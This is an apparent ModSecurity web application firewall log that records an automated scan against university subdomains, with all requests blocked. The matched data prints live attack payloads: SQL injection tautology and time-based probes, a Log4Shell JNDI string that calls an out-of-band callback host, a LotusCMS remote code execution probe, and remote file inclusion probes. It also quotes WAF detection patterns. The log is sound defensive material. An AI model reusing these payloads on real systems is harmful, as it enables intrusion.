[Tue Aug 29 11:30:25.604587 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAAPahvcAAAAL"]
[Tue Aug 29 11:30:26.308567 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAOH4SgAAAAH"]
[Tue Aug 29 11:30:26.309252 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPMl-UAAAAY"]
[Tue Aug 29 11:30:26.310529 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAOM4WAAAAAU"]
[Tue Aug 29 11:30:26.310544 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAO-1o4AAAAI"]
[Tue Aug 29 11:30:26.327529 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10YsCo-f0AAAO8744AAAAF"]
[Tue Aug 29 11:30:26.335436 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YsCo-f0AAAPQkfUAAAAe"]
[Tue Aug 29 11:30:26.368123 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg6syrqkdp7uehi.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10YsCo-f0AAAOM4WEAAAAU"]
[Tue Aug 29 11:30:26.384543 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPNBRkAAAAZ"]
[Tue Aug 29 11:30:27.493275 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10Y8Co-f0AAAOIvUEAAAAM"]
[Tue Aug 29 11:30:28.367226 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPNBR8AAAAZ"]
[Tue Aug 29 11:30:28.368912 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAANjpx8AAAAT"]
[Tue Aug 29 11:30:28.392107 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOKNnYAAAAK"]
[Tue Aug 29 11:30:28.394592 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZMCo-f0AAAPENc4AAAAQ"]
[Tue Aug 29 11:30:28.396072 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPfm8EAAAAR"]
[Tue Aug 29 11:30:28.397174 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAPPSvIAAAAd"]
[Tue Aug 29 11:30:28.401657 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOKNnYAAAAK"]
[Tue Aug 29 11:30:28.415806 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOH4TAAAAAH"]
[Tue Aug 29 11:30:28.425528 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOH4TAAAAAH"]
[Tue Aug 29 11:30:29.322728 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAOOuUYAAAAW"]
[Tue Aug 29 11:30:29.367733 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAOKNnkAAAAK"]
[Tue Aug 29 11:30:29.367895 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAANh1qwAAAAA"]
[Tue Aug 29 11:30:29.375272 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAPiBfMAAAAB"]
[Tue Aug 29 11:30:29.390776 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAPDnwYAAAAP"]
[Tue Aug 29 11:30:29.391779 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAANh1q0AAAAA"]
[Tue Aug 29 11:30:29.395308 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAOH4TQAAAAH"]
[Tue Aug 29 11:30:30.303694 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZsCo-f0AAAOKNnsAAAAK"]
[Tue Aug 29 11:30:30.426628 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPmhLMAAAAV"]
[Tue Aug 29 11:30:30.428443 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAOH4TYAAAAH"]
[Tue Aug 29 11:30:30.431777 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPENdMAAAAQ"]
[Tue Aug 29 11:30:30.440350 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPPSvkAAAAd"]
[Tue Aug 29 11:30:30.444864 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPMl-4AAAAY"]
[Tue Aug 29 11:30:30.508299 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAPDnwoAAAAP"]
